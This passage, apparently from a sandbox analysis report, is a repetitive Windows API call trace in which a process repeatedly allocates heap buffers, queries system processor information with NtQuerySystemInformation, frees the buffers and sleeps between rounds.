hHeap=0x2560000) returned 1 [0296.054] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.054] Sleep (dwMilliseconds=0x110) [0296.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0296.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0296.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0296.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0296.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0296.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0296.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0296.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0296.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.063] Sleep (dwMilliseconds=0x110) [0296.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0296.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0296.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0296.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0296.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0296.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0296.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.079] Sleep (dwMilliseconds=0x110) [0296.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0296.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0296.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0296.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0296.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0296.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0296.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0296.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0296.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.110] Sleep (dwMilliseconds=0x110) [0296.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0296.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0296.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0296.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0296.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0296.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0296.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.125] Sleep (dwMilliseconds=0x110) [0296.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0296.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0296.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0296.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0296.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0296.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0296.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.141] Sleep (dwMilliseconds=0x110) [0296.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0296.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0296.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0296.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0296.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0296.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0296.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0296.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0296.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.156] Sleep (dwMilliseconds=0x110) [0296.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0296.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0296.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0296.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0296.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0296.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0296.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0296.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.179] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0296.179] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.179] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.179] Sleep (dwMilliseconds=0x110) [0296.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0296.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0296.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0296.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0296.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0296.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0296.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0296.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0296.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.209] Sleep (dwMilliseconds=0x110) [0296.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0296.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0296.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0296.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0296.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.219] Sleep (dwMilliseconds=0x110) [0296.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0296.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0296.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0296.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0296.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0296.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0296.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0296.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0296.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.239] Sleep (dwMilliseconds=0x110) [0296.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0296.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0296.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0296.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0296.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0296.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0296.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.252] Sleep (dwMilliseconds=0x110) [0296.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0296.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0296.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0296.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0296.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0296.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0296.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0296.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0296.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.270] Sleep (dwMilliseconds=0x110) [0296.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0296.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0296.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0296.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0296.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0296.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0296.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0296.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0296.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.284] Sleep (dwMilliseconds=0x110) [0296.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0296.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0296.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0296.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0296.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0296.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, 